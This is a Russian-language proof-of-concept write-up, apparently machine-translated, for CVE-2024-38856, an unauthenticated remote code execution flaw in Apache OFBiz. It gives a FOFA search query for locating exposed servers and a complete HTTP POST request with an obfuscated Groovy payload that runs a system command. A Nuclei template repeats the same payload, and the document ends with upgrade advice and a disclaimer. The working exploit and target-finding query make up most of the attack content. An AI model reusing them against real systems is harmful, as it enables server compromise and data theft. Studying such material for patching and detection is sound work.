Описание уязвимости 0x00

Apache OFBiz — это программная платформа с открытым исходным кодом для планирования ресурсов предприятия (ERP) и управления взаимоотношениями с клиентами (CRM), которая предоставляет комплексные решения для управления предприятием, включая электронную коммерцию, управление запасами, производство, бухгалтерский учет и другие функции, а также поддерживает предприятия для гибкой настройки и Расширение. В августе 2024 года в Интернете была обнаружена неправильная авторизация Apache OFBiz, приводящая к уязвимости выполнения кода (CVE-2024-38856). Эта уязвимость позволяет удаленному злоумышленнику, не прошедшему проверку подлинности, обойти механизмы обнаружения безопасности и выполнить вредоносный код через определенный URL-адрес. Злоумышленник может использовать эту уязвимость для выполнения вредоносных операций, включая, помимо прочего, получение конфиденциальной информации, изменение данных или выполнение системных команд, что в конечном итоге может привести к компрометации сервера.

Сфера влияния

Apache OFBiz <= 18.12.14

0x01 Инструменты геодезии и картографии

FOFA：app=“Apache_OFBiz”

0x02 Повторение уязвимости

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
 
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

0x03 Скрипт обнаружения ядер

id: Apache OFBiz Неправильная авторизация приводит к удаленному выполнению кода

info:
  name: Apache OFBiz Неправильная авторизация приводит к удаленному выполнению кода
  author: admin
  severity: high
  description: Эта уязвимость позволяет неаутентифицированному удаленному злоумышленнику выполнить вредоносный код через определенный URL-адрес, минуя механизмы обнаружения безопасности. Злоумышленники могут использовать этот инструмент для выполнения вредоносных операций, включая, помимо прочего, получение конфиденциальной информации, изменение данных или выполнение системных команд, что в конечном итоге может привести к компрометации сервера.
  tags: rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/webtools/control/main/ProgramExport"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36

    body: |
      groovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b

    matchers:
      - type: word
        words:
          - "uid" 
        part: body
        condition: and

0x04 Рекомендации по восстановлению

В настоящее время существует официальная обновляемая версия, и затронутым пользователям рекомендуется выполнить обновление до последней версии: Apache OFBiz >= 18.12.15 Официальный адрес загрузки патча: https://ofbiz.apache.org/download.html

0x05 Отказ от ответственности

Любые методы, информация или инструменты, упомянутые в этой статье, предназначены только для учебных и справочных целей. Пожалуйста, не используйте информацию, представленную в этой статье, для участия в какой-либо незаконной деятельности или неподобающем поведении. Любые убытки, последствия или неблагоприятные последствия, вызванные использованием информации или инструментов, представленных в этой статье, являются исключительной ответственностью пользователя и не имеют никакого отношения к автору этой статьи. Автор отказывается от любой ответственности за любые убытки или последствия, возникшие в результате использования информации или инструментов в этой статье. Используя информацию или инструменты, представленные в этой статье, вы соглашаетесь с этим отказом от ответственности и обязуетесь соблюдать соответствующие законы, правила и этику.